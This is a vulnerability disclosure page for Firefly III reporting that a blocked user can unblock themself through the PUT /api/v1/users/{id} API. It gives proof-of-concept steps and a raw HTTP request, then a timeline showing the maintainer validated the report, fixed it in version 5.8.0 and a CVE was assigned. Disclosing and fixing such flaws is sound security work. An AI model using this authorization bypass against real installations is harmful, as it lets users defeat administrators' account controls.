A User Can Unblock Themself in firefly-iii/firefly-iii


Reported on

Jan 13th 2023


PUT /api/v1/users/{id} API doesn't properly check the authorizaion.

Proof of Concept

  1. [admin] Enable user registration functionality.
  2. [user] Register new user and login as them.
  3. [user] Create OAuth client.
  4. [admin] Block the new user on admin panel.
  5. [user] Send the following request:
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13

  1. [user] Login successfully.


If a user gets blocked, they can unblock themself.

We are processing your report and will contact the firefly-iii team within 24 hours. 3 months ago
We have contacted a member of the firefly-iii team and are waiting to hear back 3 months ago
James Cole
3 months ago


Nice find, valid issue!

James Cole validated this vulnerability 3 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
James Cole marked this as fixed in 5.8.0 with commit db0500 3 months ago
James Cole has been awarded the fix bounty
This vulnerability has been assigned a CVE
James Cole published this vulnerability 3 months ago
to join this conversation